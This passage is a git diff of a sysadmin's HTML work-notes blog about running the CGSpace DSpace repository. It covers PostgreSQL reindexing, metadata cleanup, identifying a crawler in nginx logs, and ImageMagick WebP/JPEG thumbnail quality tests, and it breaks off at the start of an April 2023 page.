+<li>After that I <a href="https://adamj.eu/tech/2021/04/13/reindexing-all-tables-after-upgrading-to-postgresql-13/">re-indexed the database indexes using a query</a>:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ su - postgres
+</span></span><span style="display:flex;"><span>$ cat /tmp/generate-reindex.sql
+</span></span><span style="display:flex;"><span>SELECT &#39;REINDEX TABLE CONCURRENTLY &#39; || quote_ident(relname) || &#39; /*&#39; || pg_size_pretty(pg_total_relation_size(C.oid)) || &#39;*/;&#39;
+</span></span><span style="display:flex;"><span>FROM pg_class C
+</span></span><span style="display:flex;"><span>LEFT JOIN pg_namespace N ON (N.oid = C.relnamespace)
+</span></span><span style="display:flex;"><span>WHERE nspname = &#39;public&#39;
+</span></span><span style="display:flex;"><span>  AND C.relkind = &#39;r&#39;
+</span></span><span style="display:flex;"><span>  AND nspname !~ &#39;^pg_toast&#39;
+</span></span><span style="display:flex;"><span>ORDER BY pg_total_relation_size(C.oid) ASC;
+</span></span><span style="display:flex;"><span>$ psql dspace &lt; /tmp/generate-reindex.sql &gt; /tmp/reindex.sql
+</span></span><span style="display:flex;"><span>$ &lt;trim the extra stuff from /tmp/reindex.sql&gt;
+</span></span><span style="display:flex;"><span>$ psql dspace &lt; /tmp/reindex.sql
+</span></span></code></pre></div><ul>
+<li>The index on <code>metadatavalue</code> shrunk by 90MB, and others a bit less
+<ul>
+<li>This is nice, but not as drastic as I noticed last year when upgrading to PostgreSQL 12</li>
+</ul>
+</li>
+</ul>
+<h2 id="2023-03-21">2023-03-21</h2>
+<ul>
+<li>Leigh sent me a list of IFPRI authors with ORCID identifiers so I combined them with our list and resolved all their names with <code>resolve_orcids.py</code>
+<ul>
+<li>It adds 154 new ORCID identifiers</li>
+</ul>
+</li>
+<li>I did a follow up to the publisher names from last week using the list from doi.org
+<ul>
+<li>Last week I only updated items with a DOI that had <em>no</em> publisher, but now I was curious to see how our existing publisher information compared</li>
+<li>I checked a dozen or so manually and, other than CIFOR/ICRAF and CIAT/Alliance, the metadata was better than our existing data, so I overwrote them</li>
+</ul>
+</li>
+<li>I spent some time trying to figure out how to get ssimulacra2 running so I could compare thumbnails in JPEG and WebP
+<ul>
+<li>I realized that we can&rsquo;t directly compare JPEG to WebP, we need to convert to JPEG/WebP, then convert each to lossless PNG</li>
+<li>Also, we shouldn&rsquo;t be comparing the resulting images against each other, but rather the original, so I need to a straight PDF to lossless PNG version also</li>
+<li>After playing with WebP at Q82 and Q92, I see it has lower ssimulacra2 scores than JPEG Q92 for the dozen test files</li>
+<li>Could it just be something with ImageMagick?</li>
+</ul>
+</li>
+</ul>
+<h2 id="2023-03-22">2023-03-22</h2>
+<ul>
+<li>I updated csv-metadata-quality to use pandas 2.0.0rc1 and everything seems to work&hellip;?
+<ul>
+<li>So the issues with nulls (isna) when I tried the first release candidate a few weeks ago were resolved?</li>
+</ul>
+</li>
+<li>Meeting with Jawoo and others about a &ldquo;ChatGPT-like&rdquo; thing for CGIAR data using CGSpace documents and metadata</li>
+</ul>
+<h2 id="2023-03-23">2023-03-23</h2>
+<ul>
+<li>Add a missing IFPRI ORCID identifier to CGSpace and tag his items on CGSpace</li>
+<li>A super unscientific comparison between csv-metadata-quality&rsquo;s pytest regimen using Pandas 1.5.3 and Pandas 2.0.0rc1
+<ul>
+<li>The data was gathered using <a href="https://justine.lol/rusage">rusage</a>, and this is the results of the last of three consecutive runs:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code># Pandas 1.5.3
+RL: took 1,585,999µs wall time
+RL: ballooned to 272,380kb in size
+RL: needed 2,093,947µs cpu (25% kernel)
+RL: caused 55,856 page faults (100% memcpy)
+RL: 699 context switches (1% consensual)
+RL: performed 0 reads and 16 write i/o operations
+
+# Pandas 2.0.0rc1
+RL: took 1,625,718µs wall time
+RL: ballooned to 262,116kb in size
+RL: needed 2,148,425µs cpu (24% kernel)
+RL: caused 63,934 page faults (100% memcpy)
+RL: 461 context switches (2% consensual)
+RL: performed 0 reads and 16 write i/o operations
+</code></pre><ul>
+<li>So it seems that Pandas 2.0.0rc1 took ten megabytes less RAM&hellip; interesting to see that the PyArrow-backed dtypes make a measurable difference even on my small test set
+<ul>
+<li>I should try to compare runs of larger input files</li>
+</ul>
+</li>
+</ul>
+<h2 id="2023-03-24">2023-03-24</h2>
+<ul>
+<li>I added a Flyway SQL migration for the PNG bitstream format registry changes on DSpace 7.6</li>
+</ul>
+<h2 id="2023-03-26">2023-03-26</h2>
+<ul>
+<li>There seems to be a slightly high load on CGSpace
+<ul>
+<li>I don&rsquo;t see any locks in PostgreSQL, but there&rsquo;s some new bot I have never heard of:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>92.119.18.13 - - [26/Mar/2023:18:41:47 +0200] &#34;GET /handle/10568/16500/discover?filtertype_0=impactarea&amp;filter_relational_operator_0=equals&amp;filter_0=Climate+adaptation+and+mitigation&amp;filtertype=sdg&amp;filter_relational_operator=equals&amp;filter=SDG+11+-+Sustainable+cities+and+communities HTTP/2.0&#34; 200 7856 &#34;-&#34; &#34;colly - https://github.com/gocolly/colly&#34;
+</span></span></code></pre></div><ul>
+<li>In the last week I see a handful of IPs making requests with this agent:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/access.log.<span style="color:#f92672">{</span>2,3,4,5,6,7<span style="color:#f92672">}</span>.gz | grep go
+</span></span><span style="display:flex;"><span>colly | awk &#39;{print $1}&#39; | sort | uniq -c | sort -h
+</span></span><span style="display:flex;"><span>      2 194.233.95.37
+</span></span><span style="display:flex;"><span>   4304 92.119.18.142
+</span></span><span style="display:flex;"><span>   9496 5.180.208.152
+</span></span><span style="display:flex;"><span>  27477 92.119.18.13
+</span></span></code></pre></div><ul>
+<li>Most of these come from Packethub S.A. / ASN 62240 (CLOUVIDER Clouvider - Global ASN, GB)</li>
+<li>Oh, I&rsquo;ve apparently seen this user agent before, as it is in our ILRI spider user agent overrides</li>
+<li>I exported CGSpace to check for missing Initiative collection mappings</li>
+<li>Start a harvest on AReS</li>
+</ul>
+<h2 id="2023-03-27">2023-03-27</h2>
+<ul>
+<li>The harvest on AReS was incredibly slow and I stopped it about half way twelve hours later
+<ul>
+<li>Then I relied on the plugins to get missing items, which caused a high load on the server but actually worked fine</li>
+</ul>
+</li>
+<li>Continue working on thumbnails on DSpace</li>
+</ul>
+<h2 id="2023-03-28">2023-03-28</h2>
+<ul>
+<li>Regarding ImageMagick there are a few things I&rsquo;ve learned
+<ul>
+<li>The <code>-quality</code> setting does different things for different output formats, see: <a href="https://imagemagick.org/script/command-line-options.php#quality">https://imagemagick.org/script/command-line-options.php#quality</a></li>
+<li>The <code>-compress</code> setting controls the compression algorithm for image data, and is unrelated to lossless/lossy
+<ul>
+<li>On that note, <code>-compress lossless</code> for JPEGs refers to Lossless JPEG, which is not well defined or supported and should be avoided</li>
+<li>See: <a href="https://imagemagick.org/script/command-line-options.php#compress">https://imagemagick.org/script/command-line-options.php#compress</a></li>
+</ul>
+</li>
+<li>The way DSpace currently does its supersampling by exporting to a JPEG, then making a thumbnail of the JPEG, is a double lossy operation
+<ul>
+<li>We should be exporting to something lossless like PNG, PPM, or MIFF, then making a thumbnail from that</li>
+</ul>
+</li>
+<li>The PNG format is always lossless so the <code>-quality</code> setting controls compression and filtering, but has no effect on the appearance or signature of PNG images</li>
+<li>You can use <code>-quality n</code> with WebP&rsquo;s <code>-define webp:lossless=true</code>,  but I&rsquo;m not sure about the interaction between ImageMagick quality and WebP lossless&hellip;
+<ul>
+<li>Also, if converting from a lossless format to WebP lossless in the same command, ImageMagick will ignore quality settings</li>
+</ul>
+</li>
+<li>The MIFF format is useful for piping between ImageMagick commands, but it is also lossless and the quality setting is ignored</li>
+<li>You can use a format specifier when piping between ImageMagick commands without writing a file</li>
+<li>For example, I want to create a lossless PNG from a distorted JPEG for comparison:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ magick convert reference.jpg -quality <span style="color:#ae81ff">85</span> jpg:- | convert - distorted-lossless.png
+</span></span></code></pre></div><ul>
+<li>If I convert the JPEG to PNG directly it will ignore the quality setting, so I set the quality and the output format, then pipe it to ImageMagick again to convert to lossless PNG</li>
+<li>In an attempt to quantify the generation loss from DSpace&rsquo;s &ldquo;JPG JPG&rdquo; method of creating thumbnails I wrote a script called <code>generation-loss.sh</code> to test against a new &ldquo;PNG JPG&rdquo; method
+<ul>
+<li>With my sample set of seventeen PDFs from CGSpace I found that <em>the &ldquo;JPG JPG&rdquo; method of thumbnailing results in scores an average of 1.6% lower than with the &ldquo;PNG JPG&rdquo; method</em>.</li>
+<li>The average file size with <em>the &ldquo;PNG JPG&rdquo; method was only 200 bytes larger</em>.</li>
+</ul>
+</li>
+<li>In my brief testing, the relationship between ImageMagick&rsquo;s <code>-quality</code> setting and WebP&rsquo;s <code>-define webp:lossless=true</code> setting are completely unpredictable:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ magick convert img/10568-103447.pdf.png /tmp/10568-103447.webp
+</span></span><span style="display:flex;"><span>$ magick convert img/10568-103447.pdf.png -define webp:lossless<span style="color:#f92672">=</span>true /tmp/10568-103447-lossless.webp
+</span></span><span style="display:flex;"><span>$ magick convert img/10568-103447.pdf.png -define webp:lossless<span style="color:#f92672">=</span>true -quality <span style="color:#ae81ff">50</span> /tmp/10568-103447-lossless-q50.webp
+</span></span><span style="display:flex;"><span>$ magick convert img/10568-103447.pdf.png -quality <span style="color:#ae81ff">10</span> -define webp:lossless<span style="color:#f92672">=</span>true /tmp/10568-103447-lossless-q10.webp
+</span></span><span style="display:flex;"><span>$ magick convert img/10568-103447.pdf.png -quality <span style="color:#ae81ff">90</span> -define webp:lossless<span style="color:#f92672">=</span>true /tmp/10568-103447-lossless-q90.webp
+</span></span><span style="display:flex;"><span>$ ls -l /tmp/10568-103447*
+</span></span><span style="display:flex;"><span>-rw-r--r-- 1 aorth aorth 359258 Mar 28 21:16 /tmp/10568-103447-lossless-q10.webp
+</span></span><span style="display:flex;"><span>-rw-r--r-- 1 aorth aorth 303850 Mar 28 21:15 /tmp/10568-103447-lossless-q50.webp
+</span></span><span style="display:flex;"><span>-rw-r--r-- 1 aorth aorth 296832 Mar 28 21:16 /tmp/10568-103447-lossless-q90.webp
+</span></span><span style="display:flex;"><span>-rw-r--r-- 1 aorth aorth 299566 Mar 28 21:13 /tmp/10568-103447-lossless.webp
+</span></span><span style="display:flex;"><span>-rw-r--r-- 1 aorth aorth 190718 Mar 28 21:13 /tmp/10568-103447.webp
+</span></span></code></pre></div><ul>
+<li>I&rsquo;m curious to see a comparison between the ImageMagick <code>-define webp:emulate-jpeg-size=true</code> (aka <code>-jpeg_like</code> in cwebp) option compared to normal lossy WebP quality:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ <span style="color:#66d9ef">for</span> q in <span style="color:#ae81ff">70</span> <span style="color:#ae81ff">80</span> 90; <span style="color:#66d9ef">do</span> magick convert img/10568-103447.pdf.png -quality $q -define webp:emulate-jpeg-size<span style="color:#f92672">=</span>true /tmp/10568-103447-lossy-emulate-jpeg-q<span style="color:#e6db74">${</span>q<span style="color:#e6db74">}</span>.webp; <span style="color:#66d9ef">done</span>
+</span></span><span style="display:flex;"><span>$ <span style="color:#66d9ef">for</span> q in <span style="color:#ae81ff">70</span> <span style="color:#ae81ff">80</span> 90; <span style="color:#66d9ef">do</span> magick convert /tmp/10568-103447-lossy-emulate-jpeg-q<span style="color:#e6db74">${</span>q<span style="color:#e6db74">}</span>.webp /tmp/10568-103447-lossy-emulate-jpeg-q<span style="color:#e6db74">${</span>q<span style="color:#e6db74">}</span>.webp.png; <span style="color:#66d9ef">done</span>
+</span></span><span style="display:flex;"><span>$ <span style="color:#66d9ef">for</span> q in <span style="color:#ae81ff">70</span> <span style="color:#ae81ff">80</span> 90; <span style="color:#66d9ef">do</span> ssimulacra2 img/10568-103447.pdf.png /tmp/10568-103447-lossy-emulate-jpeg-q<span style="color:#e6db74">${</span>q<span style="color:#e6db74">}</span>.webp.png 2&gt;/dev/null; <span style="color:#66d9ef">done</span>
+</span></span><span style="display:flex;"><span>81.29082887
+</span></span><span style="display:flex;"><span>84.42134524
+</span></span><span style="display:flex;"><span>85.84458964
+</span></span><span style="display:flex;"><span>$ <span style="color:#66d9ef">for</span> q in <span style="color:#ae81ff">70</span> <span style="color:#ae81ff">80</span> 90; <span style="color:#66d9ef">do</span> magick convert img/10568-103447.pdf.png -quality $q /tmp/10568-103447-lossy-q<span style="color:#e6db74">${</span>q<span style="color:#e6db74">}</span>.webp; <span style="color:#66d9ef">done</span>
+</span></span><span style="display:flex;"><span>$ <span style="color:#66d9ef">for</span> q in <span style="color:#ae81ff">70</span> <span style="color:#ae81ff">80</span> 90; <span style="color:#66d9ef">do</span> magick convert /tmp/10568-103447-lossy-q<span style="color:#e6db74">${</span>q<span style="color:#e6db74">}</span>.webp /tmp/10568-103447-lossy-q<span style="color:#e6db74">${</span>q<span style="color:#e6db74">}</span>.webp.png; <span style="color:#66d9ef">done</span>
+</span></span><span style="display:flex;"><span>$ <span style="color:#66d9ef">for</span> q in <span style="color:#ae81ff">70</span> <span style="color:#ae81ff">80</span> 90; <span style="color:#66d9ef">do</span> ssimulacra2 img/10568-103447.pdf.png /tmp/10568-103447-lossy-q<span style="color:#e6db74">${</span>q<span style="color:#e6db74">}</span>.webp.png 2&gt;/dev/null; <span style="color:#66d9ef">done</span>
+</span></span><span style="display:flex;"><span>77.25789006
+</span></span><span style="display:flex;"><span>80.79140936
+</span></span><span style="display:flex;"><span>84.79108246
+</span></span></code></pre></div><ul>
+<li>Using <code>-define webp:method=6</code> (versus default 4) gets a ~0.5% increase on ssimulacra2 score</li>
+</ul>
+<h2 id="2023-03-29">2023-03-29</h2>
+<ul>
+<li>Looking at the <code>-define webp:near-lossless=$q</code> option in ImageMagick and I don&rsquo;t think it&rsquo;s working:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ <span style="color:#66d9ef">for</span> q in <span style="color:#ae81ff">20</span> <span style="color:#ae81ff">40</span> <span style="color:#ae81ff">60</span> <span style="color:#ae81ff">80</span> 90; <span style="color:#66d9ef">do</span> magick convert -flatten data/10568-103447.pdf<span style="color:#ae81ff">\[</span>0<span style="color:#ae81ff">\]</span> -define webp:near-lossless<span style="color:#f92672">=</span>$q -verbose /tmp/10568-103447-near-lossless-q<span style="color:#e6db74">${</span>q<span style="color:#e6db74">}</span>.webp; <span style="color:#66d9ef">done</span> 
+</span></span><span style="display:flex;"><span>data/10568-103447.pdf[0]=&gt;/tmp/10568-103447-near-lossless-q20.webp PDF 595x842 595x842+0+0 16-bit sRGB 80440B 0.080u 0:00.043
+</span></span><span style="display:flex;"><span>data/10568-103447.pdf[0]=&gt;/tmp/10568-103447-near-lossless-q40.webp PDF 595x842 595x842+0+0 16-bit sRGB 80440B 0.080u 0:00.043
+</span></span><span style="display:flex;"><span>data/10568-103447.pdf[0]=&gt;/tmp/10568-103447-near-lossless-q60.webp PDF 595x842 595x842+0+0 16-bit sRGB 80440B 0.090u 0:00.043
+</span></span><span style="display:flex;"><span>data/10568-103447.pdf[0]=&gt;/tmp/10568-103447-near-lossless-q80.webp PDF 595x842 595x842+0+0 16-bit sRGB 80440B 0.090u 0:00.043
+</span></span><span style="display:flex;"><span>data/10568-103447.pdf[0]=&gt;/tmp/10568-103447-near-lossless-q90.webp PDF 595x842 595x842+0+0 16-bit sRGB 80440B 0.080u 0:00.043
+</span></span></code></pre></div><ul>
+<li>The file sizes are all the same&hellip;</li>
+<li>If I try with <code>-quality $q</code> it works:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ <span style="color:#66d9ef">for</span> q in <span style="color:#ae81ff">20</span> <span style="color:#ae81ff">40</span> <span style="color:#ae81ff">60</span> <span style="color:#ae81ff">80</span> 90; <span style="color:#66d9ef">do</span> magick convert -flatten data/10568-103447.pdf<span style="color:#ae81ff">\[</span>0<span style="color:#ae81ff">\]</span> -quality $q -verbose /tmp/10568-103447-q<span style="color:#e6db74">${</span>q<span style="color:#e6db74">}</span>.webp; <span style="color:#66d9ef">done</span>     
+</span></span><span style="display:flex;"><span>data/10568-103447.pdf[0]=&gt;/tmp/10568-103447-q20.webp PDF 595x842 595x842+0+0 16-bit sRGB 52602B 0.080u 0:00.045
+</span></span><span style="display:flex;"><span>data/10568-103447.pdf[0]=&gt;/tmp/10568-103447-q40.webp PDF 595x842 595x842+0+0 16-bit sRGB 64604B 0.090u 0:00.045
+</span></span><span style="display:flex;"><span>data/10568-103447.pdf[0]=&gt;/tmp/10568-103447-q60.webp PDF 595x842 595x842+0+0 16-bit sRGB 73584B 0.080u 0:00.045
+</span></span><span style="display:flex;"><span>data/10568-103447.pdf[0]=&gt;/tmp/10568-103447-q80.webp PDF 595x842 595x842+0+0 16-bit sRGB 88652B 0.090u 0:00.045
+</span></span><span style="display:flex;"><span>data/10568-103447.pdf[0]=&gt;/tmp/10568-103447-q90.webp PDF 595x842 595x842+0+0 16-bit sRGB 113186B 0.100u 0:00.049
+</span></span></code></pre></div><ul>
+<li>I don&rsquo;t see any issues mentioning this in the ImageMagick GitHub issues, so I guess I have to file a bug
+<ul>
+<li>I first <a href="https://github.com/ImageMagick/ImageMagick/discussions/6204">asked a question on their discussion board</a> because I see that the near-lossless option should have been added to ImageMagick sometime after 2020 according to another discussion</li>
+</ul>
+</li>
+<li>Meeting with Maria about the Alliance metadata on CGSpace
+<ul>
+<li>As the Alliance is not a legal entity they want to reflect that somehow in CGSpace</li>
+<li>We discussed updating all metadata, but so many documents issued in the last few years have the Alliance indicated inside them and as affiliations in journal article acknowledgements, etc, we decided it is not the best option</li>
+<li>Instead, we propose to:
+<ul>
+<li>Remove <code>Alliance of Bioversity International and CIAT</code> from the controlled vocabulary for affiliations ASAP</li>
+<li>Add <code>Bioversity International and the International Center for Tropical Agriculture</code> to the controlled vocabulary for affiliations ASAP</li>
+<li>Add a prominent note to the item page for every item in the Alliance community via a custom XMLUI theme (Maria and the Alliance publishing team to send the text)</li>
+</ul>
+</li>
+</ul>
+</li>
+</ul>
+<h2 id="2023-03-30">2023-03-30</h2>
+<ul>
+<li>The ImageMagick developers confirmed <a href="https://github.com/ImageMagick/ImageMagick/discussions/6204">my bug report</a> and created a patch on master
+<ul>
+<li>I&rsquo;m not entirely sure how it works, but the developer seemed to imply we can use lossless mode plus a quality?</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ magick convert -flatten data/10568-103447.pdf<span style="color:#ae81ff">\[</span>0<span style="color:#ae81ff">\]</span> -define webp:lossless<span style="color:#f92672">=</span>true -quality <span style="color:#ae81ff">90</span> /tmp/10568-103447.pdf.webp
+</span></span></code></pre></div><ul>
+<li>Now I see a difference between near-lossless and normal quality mode:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ <span style="color:#66d9ef">for</span> q in <span style="color:#ae81ff">20</span> <span style="color:#ae81ff">40</span> <span style="color:#ae81ff">60</span> <span style="color:#ae81ff">80</span> 90; <span style="color:#66d9ef">do</span> magick convert -flatten data/10568-103447.pdf<span style="color:#ae81ff">\[</span>0<span style="color:#ae81ff">\]</span> -define webp:lossless<span style="color:#f92672">=</span>true -quality $q /tmp/10568-103447-near-lossless-q<span style="color:#e6db74">${</span>q<span style="color:#e6db74">}</span>.webp; <span style="color:#66d9ef">done</span>
+</span></span><span style="display:flex;"><span>$ ls -l /tmp/10568-103447-near-lossless-q*
+</span></span><span style="display:flex;"><span>-rw-r--r-- 1 aorth aorth 108186 Mar 30 11:36 /tmp/10568-103447-near-lossless-q20.webp
+</span></span><span style="display:flex;"><span>-rw-r--r-- 1 aorth aorth  97170 Mar 30 11:36 /tmp/10568-103447-near-lossless-q40.webp
+</span></span><span style="display:flex;"><span>-rw-r--r-- 1 aorth aorth  97382 Mar 30 11:36 /tmp/10568-103447-near-lossless-q60.webp
+</span></span><span style="display:flex;"><span>-rw-r--r-- 1 aorth aorth 106090 Mar 30 11:36 /tmp/10568-103447-near-lossless-q80.webp
+</span></span><span style="display:flex;"><span>-rw-r--r-- 1 aorth aorth 105926 Mar 30 11:36 /tmp/10568-103447-near-lossless-q90.webp
+</span></span><span style="display:flex;"><span>$ <span style="color:#66d9ef">for</span> q in <span style="color:#ae81ff">20</span> <span style="color:#ae81ff">40</span> <span style="color:#ae81ff">60</span> <span style="color:#ae81ff">80</span> 90; <span style="color:#66d9ef">do</span> magick convert -flatten data/10568-103447.pdf<span style="color:#ae81ff">\[</span>0<span style="color:#ae81ff">\]</span> -quality $q /tmp/10568-103447-q<span style="color:#e6db74">${</span>q<span style="color:#e6db74">}</span>.webp; <span style="color:#66d9ef">done</span>
+</span></span><span style="display:flex;"><span>$ ls -l /tmp/10568-103447-q*
+</span></span><span style="display:flex;"><span>-rw-r--r-- 1 aorth aorth  52602 Mar 30 11:37 /tmp/10568-103447-q20.webp
+</span></span><span style="display:flex;"><span>-rw-r--r-- 1 aorth aorth  64604 Mar 30 11:37 /tmp/10568-103447-q40.webp
+</span></span><span style="display:flex;"><span>-rw-r--r-- 1 aorth aorth  73584 Mar 30 11:37 /tmp/10568-103447-q60.webp
+</span></span><span style="display:flex;"><span>-rw-r--r-- 1 aorth aorth  88652 Mar 30 11:37 /tmp/10568-103447-q80.webp
+</span></span><span style="display:flex;"><span>-rw-r--r-- 1 aorth aorth 113186 Mar 30 11:37 /tmp/10568-103447-q90.webp
+</span></span></code></pre></div><ul>
+<li>But after reading the source code in <code>coders/webp.c</code> I am not sure I understand, so I asked for clarification in the discussion</li>
+<li>Both Bosede and Abenet said mapping on CGSpace is taking a long time and I don&rsquo;t see any stuck locks so I decided to quickly restart postgresql</li>
+</ul>
+<h2 id="2023-03-31">2023-03-31</h2>
+<ul>
+<li>Meeting with Daniel and Naim from Alliance in Cali about CGSpace metadata, TIP, etc</li>
+</ul>
+<!-- raw HTML omitted -->
+
+  
+
+  
+
+</article> 
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/2023-04/index.html b/docs/2023-04/index.html
new file mode 100644
index 000000000..755ae4e34
--- /dev/null
+++ b/docs/2023-04/index.html
@@ -0,0 +1,805 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="April, 2023" />
+<meta property="og:description" content="2023-04-02
+
+Run all system updates on CGSpace and reboot it
+I exported CGSpace to CSV to check for any missing Initiative collection mappings
+
+I also did a check for missing country/region mappings with csv-metadata-quality
+
+
+Start a harvest on AReS
+" />
+<meta property="og:type" content="article" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2023-04/" />
+<meta property="article:published_time" content="2023-04-02T08:19:36+03:00" />
+<meta property="article:modified_time" content="2023-05-04T14:44:51+03:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="April, 2023"/>
+<meta name="twitter:description" content="2023-04-02
+
+Run all system updates on CGSpace and reboot it
+I exported CGSpace to CSV to check for any missing Initiative collection mappings
+
+I also did a check for missing country/region mappings with csv-metadata-quality
+
+
+Start a harvest on AReS
+"/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "BlogPosting",
+  "headline": "April, 2023",
+  "url": "https://alanorth.github.io/cgspace-notes/2023-04/",
+  "wordCount": "2490",
+  "datePublished": "2023-04-02T08:19:36+03:00",
+  "dateModified": "2023-05-04T14:44:51+03:00",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "keywords": "Notes"
+}
+</script>
+
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/2023-04/">
+
+    <title>April, 2023 | CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2023-04/">April, 2023</a></h2>
+    <p class="blog-post-meta">
+<time datetime="2023-04-02T08:19:36+03:00">Sun Apr 02, 2023</time>
+ in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2023-04-02">2023-04-02</h2>
+<ul>
+<li>Run all system updates on CGSpace and reboot it</li>
+<li>I exported CGSpace to CSV to check for any missing Initiative collection mappings
+<ul>
+<li>I also did a check for missing country/region mappings with csv-metadata-quality</li>
+</ul>
+</li>
+<li>Start a harvest on AReS</li>
+</ul>
+<ul>
+<li>I&rsquo;m starting to get annoyed at my shell script for doing ImageMagick tests and looking to re-write it in something object oriented like Python
+<ul>
+<li>There doesn&rsquo;t seem to be an official ImageMagick Python binding on pypi.org, perhaps I can use <a href="https://docs.wand-py.org">Wand</a>?</li>
+</ul>
+</li>
+<li>Testing Wand in Python:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span><span style="color:#f92672">from</span> wand.image <span style="color:#f92672">import</span> Image
+</span></span><span style="display:flex;"><span>
